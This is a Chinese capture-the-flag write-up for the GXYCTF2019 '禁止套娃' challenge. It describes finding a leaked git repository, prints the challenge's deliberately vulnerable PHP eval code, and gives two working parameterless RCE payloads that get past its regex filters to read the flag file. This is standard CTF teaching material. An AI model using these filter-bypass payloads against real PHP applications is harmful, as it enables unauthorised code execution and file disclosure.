[GXYCTF2019]禁止套娃

考点：

        git泄露

        无参rce

开局：

        用dirsearch扫到了flag 应该是要去读取的

        然后用githack发现是源码泄露

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

 用exp传参 也有很多过滤限制 用不了伪协议读取 还用了正则匹配

就是无参rce了

        先是绕过伪协议 然后如果‘；’===preg_replace就执行

        if里面的(?R)?          这个(?R)代表当前表达式，就是/[a-z,_]+((?R)?/),所以是种递归了，？表示递归当前表达式1次或0次 （若是(?R)*则表达递归当前表达式0次或者多次，它就可以匹配a(b(c()d()))）

        无参RCE三种一般绕过姿势：

                ·gettallheaders()

                ·get_defined_vars()

                ·session_id()

        然后就又是绕过一些关键字 带有get函数的都不能用了

        还有一个scandir可以扫描当前目录下的文件

1.exp：

exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

        ·highlight_file()函数对文件进行语法高亮显示，本函数是show_source()的别名

        ·next()输出数组中的当前元素和下一个元素的值

        ·array_reverse()函数以相反的元素顺序返回数组.(主要是能返回值)

        ·scandir()函数返回指定目录中的文件和目录的数组

        ·pos()输出数组中的当前元素的值

        ·localeconv()函数返回一个包含本地数字和货币格式信息的数组，该数组的第一个元素就是“.”。

        就是loacleconv函数固定返回一个. 然后pos将获得的.返回到我们构造的payload让scandir返回当前目录下的数组 就是当前目录下的文件 array_reverse()以相反的顺序输出（目的是正序输出查询出来的内容）然后next提取第二个元素（将.过滤）最后用hightlight_file()显示flag

2.exp：

?exp=highlight_file(session_id(session_start()));

        上面的正则过滤没有过滤掉session_id()

        我们就可以用session_id来获取flag

        在用的时候也需要用session_start()来开启session会话 因为php默认不主动使用session 

        session_id()可以获取到当前的session id.

好了开摆了